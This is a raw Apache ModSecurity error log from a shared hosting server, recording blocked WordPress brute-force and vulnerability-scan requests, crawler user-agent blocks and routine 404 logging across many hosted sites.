[Tue May 26 15:09:53.234239 2026] [security2:error] [pid 686593:tid 686832] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqaOilgkZcvx0_tl-jUgAAAPI"]
[Tue May 26 15:09:53.791205 2026] [security2:error] [pid 686593:tid 686610] [remote 111.229.141.137:53866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVqaeilgkZcvx0_tl-jbAAAwhA"]
[Tue May 26 15:09:54.002315 2026] [security2:error] [pid 686593:tid 686743] [client 192.198.113.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqaeilgkZcvx0_tl-jfgAAAJk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:09:54.433633 2026] [security2:error] [pid 686593:tid 686848] [client 192.198.113.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqauilgkZcvx0_tl-jjQAAAQI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1214858&moderation-hash=85086b9c615dd443230e63e7865eeeb4
[Tue May 26 15:09:55.288770 2026] [security2:error] [pid 686593:tid 686749] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqauilgkZcvx0_tl-jngAAAJ8"]
[Tue May 26 15:09:55.464938 2026] [security2:error] [pid 686593:tid 686763] [client 172.226.42.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVqaeilgkZcvx0_tl-jeAAAAK0"]
[Tue May 26 15:09:56.257388 2026] [security2:error] [pid 686593:tid 686732] [client 192.198.113.210:44187] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVqa-ilgkZcvx0_tl-jsQAAAI4"], referer: https://anujtradingco.com
[Tue May 26 15:09:56.601282 2026] [security2:error] [pid 686593:tid 686829] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqbOilgkZcvx0_tl-jwgAAAO8"]
[Tue May 26 15:09:58.582422 2026] [security2:error] [pid 686593:tid 686819] [client 45.132.227.223:47695] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVqa-ilgkZcvx0_tl-jtgAAAOU"]
[Tue May 26 15:09:59.348250 2026] [security2:error] [pid 686593:tid 686823] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqbuilgkZcvx0_tl-kZwAAAOk"]
[Tue May 26 15:09:59.598683 2026] [security2:error] [pid 686593:tid 686770] [client 213.230.92.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqb-ilgkZcvx0_tl-kewAAALQ"]
[Tue May 26 15:10:01.428425 2026] [security2:error] [pid 686593:tid 686788] [client 161.118.202.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVqbeilgkZcvx0_tl-kLQAAxkY"]
[Tue May 26 15:10:01.580602 2026] [security2:error] [pid 686593:tid 686817] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqceilgkZcvx0_tl-kxQAAAOM"]
[Tue May 26 15:10:02.348896 2026] [security2:error] [pid 686593:tid 686810] [client 161.118.202.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVqcuilgkZcvx0_tl-k5gAA3Bk"]
[Tue May 26 15:10:03.751974 2026] [security2:error] [pid 686593:tid 686805] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqc-ilgkZcvx0_tl-lDgAAANc"]
[Tue May 26 15:10:05.977096 2026] [security2:error] [pid 686593:tid 686782] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqdeilgkZcvx0_tl-lQgAAAMA"]
[Tue May 26 15:10:06.147137 2026] [security2:error] [pid 686593:tid 686652] [remote 74.7.241.58:49250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVqduilgkZcvx0_tl-lUAAA1Do"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 15:10:07.502450 2026] [security2:error] [pid 686593:tid 686842] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqd-ilgkZcvx0_tl-lYwAAAPw"]
[Tue May 26 15:10:07.853474 2026] [security2:error] [pid 686593:tid 686734] [client 47.128.47.144:40408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahVqd-ilgkZcvx0_tl-ldAAAAJA"]
[Tue May 26 15:10:09.702920 2026] [security2:error] [pid 686593:tid 686805] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqeeilgkZcvx0_tl-lnQAAANc"]
[Tue May 26 15:10:13.365456 2026] [security2:error] [pid 686593:tid 686838] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqfOilgkZcvx0_tl-mFQAAAPg"]
[Tue May 26 15:10:13.899395 2026] [security2:error] [pid 686593:tid 686795] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqfeilgkZcvx0_tl-mIwAAAM0"]
[Tue May 26 15:10:16.643425 2026] [security2:error] [pid 686593:tid 686825] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqgOilgkZcvx0_tl-mcQAAAOs"]
[Tue May 26 15:10:17.602145 2026] [security2:error] [pid 686593:tid 686595] [remote 31.24.44.107:33342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVqgeilgkZcvx0_tl-mlwABBAE"]
[Tue May 26 15:10:17.722317 2026] [security2:error] [pid 686593:tid 686700] [remote 103.11.102.106:51828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVqgeilgkZcvx0_tl-mngAAlGo"]
[Tue May 26 15:10:19.066833 2026] [security2:error] [pid 686593:tid 686773] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqguilgkZcvx0_tl-mxAAAALc"]
[Tue May 26 15:10:19.246111 2026] [security2:error] [pid 686593:tid 686810] [client 114.119.150.168:64119] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVqg-ilgkZcvx0_tl-m2wAAANw"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&page=1&product_id=107
[Tue May 26 15:10:20.928743 2026] [security2:error] [pid 686593:tid 686731] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqhOilgkZcvx0_tl-m_QAAAI0"]
[Tue May 26 15:10:22.983115 2026] [security2:error] [pid 686593:tid 686834] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqhuilgkZcvx0_tl-nQgAAAPQ"]
[Tue May 26 15:10:25.185174 2026] [security2:error] [pid 686593:tid 686780] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqiOilgkZcvx0_tl-njQAAAL4"]
[Tue May 26 15:10:27.837149 2026] [security2:error] [pid 686593:tid 686776] [client 113.162.128.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqi-ilgkZcvx0_tl-n6QAAALo"]
[Tue May 26 15:10:28.122750 2026] [security2:error] [pid 686593:tid 686849] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqi-ilgkZcvx0_tl-n-wAAAQM"]
[Tue May 26 15:10:29.605049 2026] [security2:error] [pid 686593:tid 686840] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqjeilgkZcvx0_tl-oHgAAAPo"]
[Tue May 26 15:10:31.537523 2026] [security2:error] [pid 686593:tid 686784] [client 195.178.110.48:50912] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "soft.ucdc.co.in"] [uri "/"] [unique_id "ahVqj-ilgkZcvx0_tl-oaAAAAMI"]
[Tue May 26 15:10:31.619987 2026] [security2:error] [pid 686593:tid 686720] [remote 82.223.24.195:43614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVqj-ilgkZcvx0_tl-oYQAAtn4"]
[Tue May 26 15:10:31.904977 2026] [security2:error] [pid 686593:tid 686776] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqj-ilgkZcvx0_tl-oZAAAALo"]
[Tue May 26 15:10:32.127515 2026] [autoindex:error] [pid 686593:tid 686809] [client 20.243.201.105:65496] AH01276: Cannot serve directory /home2/nicmaiz2/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:10:32.562568 2026] [security2:error] [pid 686593:tid 686738] [client 114.119.132.218:20915] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/libreria-/43-guerra-psicologica.html"] [unique_id "ahVqkOilgkZcvx0_tl-oeQAAAJQ"], referer: http://politica-global.com/
[Tue May 26 15:10:33.050281 2026] [security2:error] [pid 686593:tid 686764] [client 85.208.96.198:46014] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-23-27/day/2022-10-09/"] [unique_id "ahVqkeilgkZcvx0_tl-okwAAAK4"]
[Tue May 26 15:10:33.050394 2026] [security2:error] [pid 686593:tid 686764] [client 85.208.96.198:46014] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-23-27/day/2022-10-09/"] [unique_id "ahVqkeilgkZcvx0_tl-okwAAAK4"]
[Tue May 26 15:10:33.330983 2026] [security2:error] [pid 686593:tid 686783] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqkOilgkZcvx0_tl-oiQAAAME"]
[Tue May 26 15:10:36.167789 2026] [security2:error] [pid 686593:tid 686786] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqk-ilgkZcvx0_tl-o7AAAAMQ"]
[Tue May 26 15:10:36.370524 2026] [security2:error] [pid 686593:tid 686845] [client 54.205.63.235:49367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pDAAAAP8"]
[Tue May 26 15:10:36.371523 2026] [security2:error] [pid 686593:tid 686800] [client 54.205.63.235:51979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pEQAAANI"]
[Tue May 26 15:10:36.371830 2026] [security2:error] [pid 686593:tid 686813] [client 54.205.63.235:51980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pEAAAAN8"]
[Tue May 26 15:10:36.371925 2026] [security2:error] [pid 686593:tid 686801] [client 54.205.63.235:51983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pEwAAANM"]
[Tue May 26 15:10:36.372141 2026] [security2:error] [pid 686593:tid 686749] [client 54.205.63.235:51982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pEgAAAJ8"]
[Tue May 26 15:10:36.372645 2026] [security2:error] [pid 686593:tid 686824] [client 54.205.63.235:51986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pFgAAAOo"]
[Tue May 26 15:10:36.372691 2026] [security2:error] [pid 686593:tid 686778] [client 54.205.63.235:51981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pFAAAALw"]
[Tue May 26 15:10:36.372735 2026] [security2:error] [pid 686593:tid 686813] [client 54.205.63.235:51985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pFwAAAN8"]
[Tue May 26 15:10:36.372768 2026] [security2:error] [pid 686593:tid 686736] [client 54.205.63.235:51984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/old/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pFQAAAJI"]
[Tue May 26 15:10:36.373163 2026] [security2:error] [pid 686593:tid 686842] [client 54.205.63.235:51987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pGAAAAPw"]
[Tue May 26 15:10:36.373463 2026] [security2:error] [pid 686593:tid 686737] [client 54.205.63.235:51988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pGQAAAJM"]
[Tue May 26 15:10:36.373481 2026] [security2:error] [pid 686593:tid 686813] [client 54.205.63.235:51989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pGgAAAN8"]
[Tue May 26 15:10:36.426204 2026] [security2:error] [pid 686593:tid 686806] [client 54.205.63.235:51963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pDgAAANg"]
[Tue May 26 15:10:36.426650 2026] [security2:error] [pid 686593:tid 686781] [client 54.205.63.235:51964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pDwAAAL8"]
[Tue May 26 15:10:36.438885 2026] [security2:error] [pid 686593:tid 686750] [client 54.205.63.235:51962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVqlOilgkZcvx0_tl-pDQAAAKA"]
[Tue May 26 15:10:36.478130 2026] [security2:error] [pid 686593:tid 686754] [client 54.205.63.235:52029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/test/wp-admin/install.php"] [unique_id "ahVqlOilgkZcvx0_tl-pGwAAAKQ"]
[Tue May 26 15:10:38.395163 2026] [security2:error] [pid 686593:tid 686813] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqleilgkZcvx0_tl-pUwAAAN8"]
[Tue May 26 15:10:40.707475 2026] [security2:error] [pid 686593:tid 686799] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqmOilgkZcvx0_tl-plQAAANE"]
[Tue May 26 15:10:42.236931 2026] [security2:error] [pid 686593:tid 686794] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqmeilgkZcvx0_tl-pvgAAAMw"]
[Tue May 26 15:10:44.538887 2026] [security2:error] [pid 686593:tid 686824] [client 172.226.42.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVqnOilgkZcvx0_tl-qBQAAAOo"]
